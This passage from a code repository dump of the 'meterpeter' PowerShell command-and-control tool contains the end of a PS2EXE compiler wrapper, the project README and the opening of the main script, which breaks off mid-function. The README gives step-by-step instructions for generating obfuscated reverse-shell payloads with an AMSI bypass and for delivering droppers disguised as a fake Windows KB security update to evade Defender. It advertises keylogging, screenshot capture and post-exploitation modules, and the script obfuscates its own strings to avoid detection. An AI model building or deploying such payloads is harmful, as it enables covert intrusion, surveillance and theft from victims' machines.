(_consoleColorProxy = PSObject.AsPSObject(new ConsoleColorProxy(ui)));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tprivate PSObject _consoleColorProxy;\r\n\r\n\t\tpublic override System.Globalization.CultureInfo CurrentCulture\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn this.originalCultureInfo;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override System.Globalization.CultureInfo CurrentUICulture\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn this.originalUICultureInfo;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override Guid InstanceId\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn this.myId;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override string Name\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn \"PS2EXE_Host\";\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override PSHostUserInterface UI\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn ui;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override Version Version\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn new Version(0, 5, 0, 21);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override void EnterNestedPrompt()\r\n\t\t{\r\n\t\t}\r\n\r\n\t\tpublic override void ExitNestedPrompt()\r\n\t\t{\r\n\t\t}\r\n\r\n\t\tpublic override void NotifyBeginApplication()\r\n\t\t{\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tpublic override void NotifyEndApplication()\r\n\t\t{\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tpublic override void SetShouldExit(int exitCode)\r\n\t\t{\r\n\t\t\tthis.parent.ShouldExit = true;\r\n\t\t\tthis.parent.ExitCode = exitCode;\r\n\t\t}\r\n\t}\r\n\r\n\tinternal interface PS2EXEApp\r\n\t{\r\n\t\tbool ShouldExit { get; set; }\r\n\t\tint ExitCode { get; set; }\r\n\t}\r\n\r\n\tinternal class PS2EXE : PS2EXEApp\r\n\t{\r\n\t\tprivate bool shouldExit;\r\n\r\n\t\tprivate int exitCode;\r\n\r\n\t\tpublic bool ShouldExit\r\n\t\t{\r\n\t\t\tget { return this.shouldExit; }\r\n\t\t\tset { this.shouldExit = value; }\r\n\t\t}\r\n\r\n\t\tpublic int ExitCode\r\n\t\t{\r\n\t\t\tget { return this.exitCode; }\r\n\t\t\tset { this.exitCode = value; 
}\r\n\t\t}\r\n\r\n\t\t$(if ($STA){\"[STAThread]\"})$(if ($MTA){\"[MTAThread]\"})\r\n\t\tprivate static int Main(string[] args)\r\n\t\t{\r\n\t\t\t$culture\r\n\r\n\t\t\t$(if (!$noVisualStyles -and $noConsole) { \"Application.EnableVisualStyles();\" })\r\n\t\t\tPS2EXE me = new PS2EXE();\r\n\r\n\t\t\tbool paramWait = false;\r\n\t\t\tstring extractFN = string.Empty;\r\n\r\n\t\t\tPS2EXEHostUI ui = new PS2EXEHostUI();\r\n\t\t\tPS2EXEHost host = new PS2EXEHost(me, ui);\r\n\t\t\tSystem.Threading.ManualResetEvent mre = new System.Threading.ManualResetEvent(false);\r\n\r\n\t\t\tAppDomain.CurrentDomain.UnhandledException += new UnhandledExceptionEventHandler(CurrentDomain_UnhandledException);\r\n\r\n\t\t\ttry\r\n\t\t\t{\r\n\t\t\t\tusing (Runspace myRunSpace = RunspaceFactory.CreateRunspace(host))\r\n\t\t\t\t{\r\n\t\t\t\t\t$(if ($STA -or $MTA) {\"myRunSpace.ApartmentState = System.Threading.ApartmentState.\"})$(if ($STA){\"STA\"})$(if ($MTA){\"MTA\"});\r\n\t\t\t\t\tmyRunSpace.Open();\r\n\r\n\t\t\t\t\tusing (System.Management.Automation.PowerShell powershell = System.Management.Automation.PowerShell.Create())\r\n\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\tConsole.CancelKeyPress += new ConsoleCancelEventHandler(delegate(object sender, ConsoleCancelEventArgs e)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\ttry\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tpowershell.BeginStop(new AsyncCallback(delegate(IAsyncResult r)\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tmre.Set();\r\n\t\t\t\t\t\t\t\t\te.Cancel = true;\r\n\t\t\t\t\t\t\t\t}), null);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tcatch\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t});\r\n\"@ })\r\n\r\n\t\t\t\t\t\tpowershell.Runspace = myRunSpace;\r\n\t\t\t\t\t\tpowershell.Streams.Error.DataAdded += new EventHandler<DataAddedEventArgs>(delegate(object sender, DataAddedEventArgs 
e)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tui.WriteErrorLine(((PSDataCollection<ErrorRecord>)sender)[e.Index].ToString());\r\n\t\t\t\t\t\t});\r\n\r\n\t\t\t\t\t\tPSDataCollection<string> colInput = new PSDataCollection<string>();\r\n$(if (!$runtime20) {@\"\r\n\t\t\t\t\t\tif (ConsoleInfo.IsInputRedirected())\r\n\t\t\t\t\t\t{ // read standard input\r\n\t\t\t\t\t\t\tstring sItem = \"\";\r\n\t\t\t\t\t\t\twhile ((sItem = Console.ReadLine()) != null)\r\n\t\t\t\t\t\t\t{ // add to powershell pipeline\r\n\t\t\t\t\t\t\t\tcolInput.Add(sItem);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\"@ })\r\n\t\t\t\t\t\tcolInput.Complete();\r\n\r\n\t\t\t\t\t\tPSDataCollection<PSObject> colOutput = new PSDataCollection<PSObject>();\r\n\t\t\t\t\t\tcolOutput.DataAdded += new EventHandler<DataAddedEventArgs>(delegate(object sender, DataAddedEventArgs e)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tui.WriteLine(colOutput[e.Index].ToString());\r\n\t\t\t\t\t\t});\r\n\r\n\t\t\t\t\t\tint separator = 0;\r\n\t\t\t\t\t\tint idx = 0;\r\n\t\t\t\t\t\tforeach (string s in args)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif (string.Compare(s, \"-wait\", true) == 0)\r\n\t\t\t\t\t\t\t\tparamWait = true;\r\n\t\t\t\t\t\t\telse if (s.StartsWith(\"-extract\", StringComparison.InvariantCultureIgnoreCase))\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstring[] s1 = s.Split(new string[] { \":\" }, 2, StringSplitOptions.RemoveEmptyEntries);\r\n\t\t\t\t\t\t\t\tif (s1.Length != 2)\r\n\t\t\t\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\t\t\t\tConsole.WriteLine(\"If you specify the -extract option you need to add a file for extraction in this way\\r\\n   -extract:\\\"<filename>\\\"\");\r\n\"@ } else {@\"\r\n\t\t\t\t\t\t\t\t\tMessageBox.Show(\"If you specify the -extract option you need to add a file for extraction in this way\\r\\n   -extract:\\\"<filename>\\\"\", System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Error);\r\n\"@ })\r\n\t\t\t\t\t\t\t\t\treturn 1;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\textractFN = 
s1[1].Trim(new char[] { '\\\"' });\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse if (string.Compare(s, \"-end\", true) == 0)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tseparator = idx + 1;\r\n\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse if (string.Compare(s, \"-debug\", true) == 0)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tSystem.Diagnostics.Debugger.Launch();\r\n\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tidx++;\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tstring script = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@\"$($script)\"));\r\n\r\n\t\t\t\t\t\tif (!string.IsNullOrEmpty(extractFN))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tSystem.IO.File.WriteAllText(extractFN, script);\r\n\t\t\t\t\t\t\treturn 0;\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tpowershell.AddScript(script);\r\n\r\n\t\t\t\t\t\t// parse parameters\r\n\t\t\t\t\t\tstring argbuffer = null;\r\n\t\t\t\t\t\t// regex for named parameters\r\n\t\t\t\t\t\tSystem.Text.RegularExpressions.Regex regex = new System.Text.RegularExpressions.Regex(@\"^-([^: ]+)[ :]?([^:]*)$\");\r\n\r\n\t\t\t\t\t\tfor (int i = separator; i < args.Length; i++)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tSystem.Text.RegularExpressions.Match match = regex.Match(args[i]);\r\n\t\t\t\t\t\t\tif (match.Success && match.Groups.Count == 3)\r\n\t\t\t\t\t\t\t{ // parameter in powershell style, means named parameter found\r\n\t\t\t\t\t\t\t\tif (argbuffer != null) // already a named parameter in buffer, then flush it\r\n\t\t\t\t\t\t\t\t\tpowershell.AddParameter(argbuffer);\r\n\r\n\t\t\t\t\t\t\t\tif (match.Groups[2].Value.Trim() == \"\")\r\n\t\t\t\t\t\t\t\t{ // store named parameter in buffer\r\n\t\t\t\t\t\t\t\t\targbuffer = match.Groups[1].Value;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t// caution: when called in powershell $TRUE gets converted, when called in cmd.exe not\r\n\t\t\t\t\t\t\t\t\tif ((match.Groups[2].Value == \"$TRUE\") || (match.Groups[2].Value.ToUpper() == \"\\x24TRUE\"))\r\n\t\t\t\t\t\t\t\t\t{ // 
switch found\r\n\t\t\t\t\t\t\t\t\t\tpowershell.AddParameter(match.Groups[1].Value, true);\r\n\t\t\t\t\t\t\t\t\t\targbuffer = null;\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t\t// caution: when called in powershell $FALSE gets converted, when called in cmd.exe not\r\n\t\t\t\t\t\t\t\t\t\tif ((match.Groups[2].Value == \"$FALSE\") || (match.Groups[2].Value.ToUpper() == \"\\x24\"+\"FALSE\"))\r\n\t\t\t\t\t\t\t\t\t\t{ // switch found\r\n\t\t\t\t\t\t\t\t\t\t\tpowershell.AddParameter(match.Groups[1].Value, false);\r\n\t\t\t\t\t\t\t\t\t\t\targbuffer = null;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t\t{ // named parameter with value found\r\n\t\t\t\t\t\t\t\t\t\t\tpowershell.AddParameter(match.Groups[1].Value, match.Groups[2].Value);\r\n\t\t\t\t\t\t\t\t\t\t\targbuffer = null;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t{ // unnamed parameter found\r\n\t\t\t\t\t\t\t\tif (argbuffer != null)\r\n\t\t\t\t\t\t\t\t{ // already a named parameter in buffer, so this is the value\r\n\t\t\t\t\t\t\t\t\tpowershell.AddParameter(argbuffer, args[i]);\r\n\t\t\t\t\t\t\t\t\targbuffer = null;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t{ // position parameter found\r\n\t\t\t\t\t\t\t\t\tpowershell.AddArgument(args[i]);\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tif (argbuffer != null) powershell.AddParameter(argbuffer); // flush parameter buffer...\r\n\r\n\t\t\t\t\t\t// convert output to strings\r\n\t\t\t\t\t\tpowershell.AddCommand(\"out-string\");\r\n\t\t\t\t\t\t// with a single string per line\r\n\t\t\t\t\t\tpowershell.AddParameter(\"stream\");\r\n\r\n\t\t\t\t\t\tpowershell.BeginInvoke<string, PSObject>(colInput, colOutput, null, new AsyncCallback(delegate(IAsyncResult ar)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif (ar.IsCompleted)\r\n\t\t\t\t\t\t\t\tmre.Set();\r\n\t\t\t\t\t\t}), null);\r\n\r\n\t\t\t\t\t\twhile (!me.ShouldExit && 
!mre.WaitOne(100))\r\n\t\t\t\t\t\t{ };\r\n\r\n\t\t\t\t\t\tpowershell.Stop();\r\n\r\n\t\t\t\t\t\tif (powershell.InvocationStateInfo.State == PSInvocationState.Failed)\r\n\t\t\t\t\t\t\tui.WriteErrorLine(powershell.InvocationStateInfo.Reason.Message);\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tmyRunSpace.Close();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tcatch (Exception ex)\r\n\t\t\t{\r\n$(if (!$noError) { if (!$noConsole) {@\"\r\n\t\t\t\tConsole.Write(\"An exception occured: \");\r\n\t\t\t\tConsole.WriteLine(ex.Message);\r\n\"@ } else {@\"\r\n\t\t\t\tMessageBox.Show(\"An exception occured: \" + ex.Message, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Error);\r\n\"@ } })\r\n\t\t\t}\r\n\r\n\t\t\tif (paramWait)\r\n\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\tConsole.WriteLine(\"Hit any key to exit...\");\r\n\t\t\t\tConsole.ReadKey();\r\n\"@ } else {@\"\r\n\t\t\t\tMessageBox.Show(\"Click OK to exit...\", System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ })\r\n\t\t\t}\r\n\t\t\treturn me.ExitCode;\r\n\t\t}\r\n\r\n\t\tstatic void CurrentDomain_UnhandledException(object sender, UnhandledExceptionEventArgs e)\r\n\t\t{\r\n\t\t\tthrow new Exception(\"Unhandled exception in PS2EXE\");\r\n\t\t}\r\n\t}\r\n}\r\n\"@\r\n\r\n$configFileForEXE2 = \"<?xml version=\"\"1.0\"\" encoding=\"\"utf-8\"\" ?>`r`n<configuration><startup><supportedRuntime version=\"\"v2.0.50727\"\"/></startup></configuration>\"\r\n$configFileForEXE3 = \"<?xml version=\"\"1.0\"\" encoding=\"\"utf-8\"\" ?>`r`n<configuration><startup><supportedRuntime version=\"\"v4.0\"\" sku=\"\".NETFramework,Version=v4.0\"\" /></startup></configuration>\"\r\n\r\nif ($longPaths)\r\n{\r\n\t$configFileForEXE3 = \"<?xml version=\"\"1.0\"\" encoding=\"\"utf-8\"\" ?>`r`n<configuration><startup><supportedRuntime version=\"\"v4.0\"\" sku=\"\".NETFramework,Version=v4.0\"\" /></startup><runtime><AppContextSwitchOverrides value=\"\"Switch.System.IO.UseLegacyPathHandling=false;Switch.System.IO.BlockLongPaths=false\"\" 
/></runtime></configuration>\"\r\n}\r\n\r\n#Write-Output \"Compiling file...\"\r\n$cr = $cop.CompileAssemblyFromSource($cp, $programFrame)\r\nif ($cr.Errors.Count -gt 0)\r\n{\r\n\tif (Test-Path $outputFile)\r\n\t{\r\n\t\tRemove-Item $outputFile -Verbose:$FALSE\r\n\t}\r\n\tWrite-Error -ErrorAction Continue \"Could not create the PowerShell .exe file because of compilation errors. Use -verbose parameter to see details.\"\r\n\t$cr.Errors | ForEach-Object { Write-Verbose $_ -Verbose:$verbose}\r\n}\r\nelse\r\n{\r\n\tif (Test-Path $outputFile)\r\n\t{\r\n        If($outputFile -match 'meterpeter'){$parsingPath = $outputFile -replace '\\\\PS2EXE',''}else{$parsingPath = $outputFile}\r\n\t\tWrite-Output \"   Output file => $parsingPath `n`n\"\r\n\r\n\t\tif ($debug)\r\n\t\t{\r\n\t\t\t$cr.TempFiles | Where-Object { $_ -ilike \"*.cs\" } | Select-Object -First 1 | ForEach-Object {\r\n\t\t\t\t$dstSrc = ([System.IO.Path]::Combine([System.IO.Path]::GetDirectoryName($outputFile), [System.IO.Path]::GetFileNameWithoutExtension($outputFile)+\".cs\"))\r\n\t\t\t\tWrite-Output \"Source file name for debug copied: $($dstSrc)\"\r\n\t\t\t\tCopy-Item -Path $_ -Destination $dstSrc -Force\r\n\t\t\t}\r\n\t\t\t$cr.TempFiles | Remove-Item -Verbose:$FALSE -Force -ErrorAction SilentlyContinue\r\n\t\t}\r\n\t\tif ($CFGFILE)\r\n\t\t{\r\n\t\t\tif ($runtime20)\r\n\t\t\t{\r\n\t\t\t\t$configFileForEXE2 | Set-Content ($outputFile+\".config\") -Encoding UTF8\r\n\t\t\t}\r\n\t\t\tif ($runtime40)\r\n\t\t\t{\r\n\t\t\t\t$configFileForEXE3 | Set-Content ($outputFile+\".config\") -Encoding UTF8\r\n\t\t\t}\r\n\t\t\tWrite-Output \"Config file for EXE created\"\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tWrite-Error -ErrorAction \"Continue\" \"   Output file => $outputFile not written`n`n\"\r\n\t}\r\n}\r\n\r\nif ($requireAdmin -or $supportOS -or $longPaths)\r\n{ if (Test-Path $($outputFile+\".win32manifest\"))\r\n\t{\r\n\t\tRemove-Item $($outputFile+\".win32manifest\") -Verbose:$FALSE\r\n\t}\r\n}\r\nIf(Test-Path 
\"Update-KB4524147.ps1\"){Remove-Item -Path \"Update-KB4524147.ps1\" -Force}\r\n"
  },
  {
    "path": "README.md",
    "content": "Author: <b><i>@r00t-3xp10it</i></b><br />\r\nVersion release: <b><i>v2.10.14</i></b><br />\r\nDistros Supported: <b><i>Windows (x86|x64), Linux</i></b><br />\r\nInspired in the work of: ['@ZHacker13 - ReverseTCPShell'](https://github.com/ZHacker13/ReverseTCPShell)<br /><br />\r\n![banner](https://user-images.githubusercontent.com/23490060/163636021-4351eca6-b66b-4817-b4b9-182a66070584.png)<br />\r\n\r\n[![Version](https://img.shields.io/badge/meterpeter-v2.10.14-brightgreen.svg?maxAge=259200)]()\r\n[![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()\r\n[![Build](https://img.shields.io/badge/OS-Windows,Linux-orange.svg)]()\r\n![licence](https://img.shields.io/badge/license-GPLv3-brightgreen.svg)\r\n![Last Commit](https://img.shields.io/github/last-commit/r00t-3xp10it/meterpeter)\r\n![isues](https://img.shields.io/github/issues/r00t-3xp10it/meterpeter)\r\n![Repo Size](https://img.shields.io/github/repo-size/r00t-3xp10it/meterpeter)\r\n\r\n<br />\r\n\r\n## :octocat: Quick Jump List<br />\r\n- **[Project Description](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-project-description)**<br />\r\n- **[List Of Available Modules](https://gist.github.com/r00t-3xp10it/4b066797ddc99a3fc41195ddfaf4af9b?permalink_comment_id=4133582#gistcomment-4133582)**<br />\r\n- **[Meterpeter C2 Latest Release](https://github.com/r00t-3xp10it/meterpeter/releases/tag/v2.10.14)**<br />\r\n- **[How To - Under Linux Distributions](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#attacker-machine-linux-kali)**<br />\r\n- **[How To - Under Windows Distributions](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#attacker-machiner-windows-pc)**<br />\r\n- **[Special Thanks|Contributions|Videos](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#video-tutorials)**<br />\r\n- **[Please Read my 'WIKI' page for detailed information about each 
Module](https://github.com/r00t-3xp10it/meterpeter/wiki)**<br />\r\n\r\n<br />\r\n\r\n## :octocat: Project Description\r\nThis PS1 starts a listener Server on a Windows|Linux attacker machine and generates oneliner PS reverse shell payloads obfuscated in BXOR with a random secret key and another layer of Characters/Variables Obfuscation to be executed on the victim machine (The payload will also execute AMSI reflection bypass in current session to evade AMSI detection while working). You can also recive the generated oneliner reverse shell connection via netcat. (in this case you will lose the C2 functionalities like screenshot, upload, download files, Keylogger, AdvInfo, PostExploit, etc)<br /><br />meterpeter payloads/droppers can be executed using User or Administrator Privileges depending of the cenario (executing the Client as Administrator will unlock ALL Server Modules, amsi bypasses, etc.). Droppers mimic a fake KB Security Update while in background download\\exec Client in '<b><i>$Env:TMP</i></b>' trusted location, with the intent of evading  Windows Defender Exploit Guard. meterpeter payloads|droppers are FUD (please dont test samples on VirusTotal).<br />\r\n\r\nUnder Linux users required to install **powershell** and **apache2** webserver, Under Windows its optional the install of **python3** http.server to deliver payloads under LAN networks. 
If this requirements are **NOT** met, then the Client ( <b><i>Update-KB4524147.ps1</i></b> ) will be written in meterpeter working directory for manual deliver.\r\n![oki1](https://user-images.githubusercontent.com/23490060/135849854-575d3dcd-21c5-44a1-96fe-3684d586c128.png)<br />\r\n\r\n<br />\r\n\r\n**[Quick Jump List](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-quick-jump-list)**<br />\r\n\r\n\r\n---\r\n\r\n<br /><br />\r\n\r\n### ATTACKER MACHINE: [Linux Kali]\r\n      Warning: powershell under linux distributions its only available for x64 bits archs ..\r\n![linux](https://user-images.githubusercontent.com/23490060/74575258-26951700-4f7e-11ea-832c-512dce1c97cc.png)\r\n\r\n<br />\r\n\r\n#### Install Powershell (Linux x64 bits)\r\n```\r\napt-get update && apt-get install -y powershell\r\n```\r\n\r\n#### Install Apache2\r\n```\r\napt-get install Apache2\r\n```\r\n\r\n#### Start Apache2 WebServer\r\n```\r\nservice apache2 start\r\n```\r\n\r\n#### Start C2 Server (Local)\r\n```\r\ncd meterpeter\r\npwsh -File meterpeter.ps1\r\n```\r\n\r\n#### Deliver Dropper/Payload To Target Machine (apache2)\r\n```\r\nUSE THE 'Attack Vector URL' TO DELIVER 'Update-KB4524147.zip' (dropper) TO TARGET ..\r\nUNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator)..\r\n```\r\n\r\n#### Remark:\r\n\r\n     IF dropper.bat its executed: Then the Client will use $env:tmp has its working directory ('recomended')..\r\n     IF Attacker decided to manualy execute Client: Then Client remote location (pwd) will be used has working dir .\r\n\r\n\r\n**[Quick Jump List](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-quick-jump-list)**<br />\r\n\r\n---\r\n\r\n<br /><br />\r\n\r\n### ATTACKER MACHINER: [Windows PC]\r\n![frd](https://user-images.githubusercontent.com/23490060/74575907-b76cf200-4f80-11ea-8f44-ddd79fbd812f.png)\r\n\r\n<br />\r\n\r\n#### Install Python3 (optional)\r\nInstall Python3 (http.Server) to deliver 
payloads under LAN networks ..<br />\r\n```\r\nhttps://www.python.org/downloads/release/python-381/\r\n```\r\n\r\nCheck if python **http.server** its installed<br />\r\n```\r\n$Local_Host = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\r\npython -m http.server 8080 --bind $Local_Host\r\nCTRL+C # Exit webserver console\r\n```\r\n\r\n\r\n#### Start C2 Server (Local)\r\n```\r\ncd meterpeter\r\npowershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser\r\npowershell -File meterpeter.ps1\r\n```\r\n\r\n**Remark**\r\n- meterpeter.ps1 delivers Dropper/Payload using python3 http.server. IF attacker has python3 installed.<br />\r\n  **'If NOT then the payload (Client) its written in Server Local [Working Directory](https://github.com/r00t-3xp10it/meterpeter/wiki/How-To-Display%7CChange-'Client'-Working-Directory) to be Manualy Deliver'** ..\r\n\r\n- Remmnenber to close the http.server terminal after the target have recived the two files (Dropper & Client)<br />\r\n  **'And we have recived the connection in our meterpeter Server { to prevent Server|Client connection errors }'**<br /><br />\r\n\r\n#### Deliver Dropper/Payload To Target Machine (manual OR python3)\r\n```\r\nDELIVER 'Update-KB4524147' (.ps1=manual) OR (.zip=automated|silentExec) TO TARGET ..\r\n```\r\n\r\n#### Remark:\r\n\r\n     IF dropper.bat its executed: Then the Client will use $env:tmp has its working directory ('recomended')..\r\n     IF Attacker decided to manualy execute Client: Then Client remote location (pwd) will be used has working dir .\r\n\r\n**[Quick Jump List](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-quick-jump-list)**<br />\r\n\r\n---\r\n\r\n<br />\r\n\r\n### Video Tutorials:\r\nmeterpeter Under Windows Distros: https://www.youtube.com/watch?v=d2npuCXsMvE<br />\r\nmeterpeter Under Linux Distros: https://www.youtube.com/watch?v=CmMbWmN246E<br /><br />\r\n\r\n### Special Thanks:\r\n**@ZHacker13** (Original Rev Shell) | **@tedburke** (CommandCam.exe 
binary)<br />\r\n**@codings9** (debugging modules) | @ShantyDamayanti (debugging Modules)<br />\r\n**@AHLASaad** (debugging Modules) | **@gtworek** (EnableAllParentPrivileges)<br /><br />\r\n- **[meterpeter WIKI pages (Oficial Documentation)](https://github.com/r00t-3xp10it/meterpeter/wiki)**<br />\r\n- **[Jump To Top of this readme File](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-quick-jump-list)**<br />\r\n---\r\n\r\n<br />\r\n"
  },
  {
    "path": "meterpeter.ps1",
    "content": "﻿##\r\n#   Author: @r00t-3xp10it (ssa redteam)\r\n#   Tested Under: Windows 10 (19044) x64 bits\r\n#   Required Dependencies: Invoke-WebRequest\r\n#   Optional Dependencies: BitsTransfer|Python\r\n#   PS cmdlet Dev version: V2.10.14\r\n#   PS cmdlet sub version: V2.10.14.0\r\n#   GitHub: https://github.com/r00t-3xp10it/meterpeter/releases\r\n##\r\n\r\n$SserverTime = Get-Date -Format \"dd/MM/yyyy HH:mm:ss\"\r\n$HTTP_PORT = \"8087\"                 # Python http.server LPort (optional)\r\n$CmdLetVersion = \"2.10.14\"          # meterpeter C2 version (dont change)\r\n$DeveloVersion = \"2.10.14.0\"        # meterpeter C2 dev version (dont change)\r\n$payload_name = \"Update-KB5005101\"  # Client-payload filename (dont change)\r\n$Dropper_Name = \"Update-KB5005101\"  # Payload-dropp`er filename (optional)\r\n$Acdst = \"rem#ote ac#ce#ss\" -replace '#',''\r\n$Acdts = \"ob#fus#cat#ed\" -replace '#',''\r\n\r\n$EndBanner = @\"\r\n\r\n  __  __  ____  _____  ____  ____  ____  ____  _____  ____  ____ \r\n |  \\/  || ===||_   _|| ===|| () )| ()_)| ===||_   _|| ===|| () )\r\n |_|\\/|_||____|  |_|  |____||_|\\_\\|_|   |____|  |_|  |____||_|\\_\\\r\n Author: @ZHacker13 &('r00t-3xp10it') - SSA_redteam @2023 V${CmdLetVersion}\r\n Date: $SserverTime - Cmdlet subdevelop version: $DeveloVersion\r\n\"@;\r\n\r\n$StartBanner = @\"\r\n\r\n  __  __  ____  _____  ____  ____  ____  ____  _____  ____  ____ \r\n |  \\/  || ===||_   _|| ===|| () )| ()_)| ===||_   _|| ===|| () )\r\n |_|\\/|_||____|  |_|  |____||_|\\_\\|_|   |____|  |_|  |____||_|\\_\\\r\n Author: @ZHacker13 &('r00t-3xp10it') - SSA_redteam @2023 V${CmdLetVersion}\r\n\r\n Meterpeter its a command & control (C2) $Acdst tool (rat)\r\n written in pure powershell released to windows (python3 required)\r\n or to linux (powershell and apache2 required) distros. 
It creates\r\n reverse_tcp_shell payloads (pure powershell + sockets) $Acdts\r\n in BXOR using a secret key and also creates one dropper file that\r\n allow users to fast deliver the payload on LAN networks for tests.\r\n\"@;\r\n\r\n$Modules = @\"\r\n\r\n  __  __  ____  _____  ____  ____  ____  ____  _____  ____  ____ \r\n |  \\/  || ===||_   _|| ===|| () )| ()_)| ===||_   _|| ===|| () )\r\n |_|\\/|_||____|  |_|  |____||_|\\_\\|_|   |____|  |_|  |____||_|\\_\\\r\n Author: @ZHacker13 &('r00t-3xp10it') - SSA_redteam @2023 V${CmdLetVersion}\r\n\r\n\r\n  Command      Description\r\n  -------      ------------------------------\r\n  Info         Remote host system information\r\n  Session      Meterpeter C2 connection status\r\n  AdvInfo      Advanced system information sub-menu\r\n  Upload       Upload from local host to remote host\r\n  Download     Download from remote host to local host\r\n  Screenshot   Capture remote host desktop screenshots\r\n  keylogger    Install remote host keyloggers sub-menu\r\n  PostExploit  Post Exploitation modules sub-menu\r\n  NetScanner   Local LAN network scanner sub-menu\r\n  Pranks       Prank remote host modules sub-menu\r\n  exit         Exit rev_tcp_shell [server+client]\r\n\r\n\r\n\"@;\r\n\r\n\r\ntry{#Check http.server\r\n   $MyServer = python -V\r\n   If(-not($MyServer) -or $MyServer -eq $null)\r\n   {\r\n      $strMsg = \"Warning: python (http.server) not found in current system.\" + \"`n\" + \"  'Install python (http.server) to deliver payloads on LAN'..\"\r\n      powershell (New-Object -ComObject Wscript.Shell).Popup($strMsg,10,'Deliver Meterpeter payloads on LAN',0+48)|Out-Null\r\n   }\r\n   Else\r\n   {\r\n      $PInterpreter = \"python\"\r\n   }\r\n}Catch{\r\n   powershell (New-Object -ComObject Wscript.Shell).Popup(\"python interpreter not found ...\",6,'Deliver Meterpeter payloads on LAN',0+48)|Out-Null\r\n}\r\n\r\n\r\nfunction Char_Obf($String){\r\n\r\n  $String = $String.toCharArray();  \r\n  ForEach($Letter in 
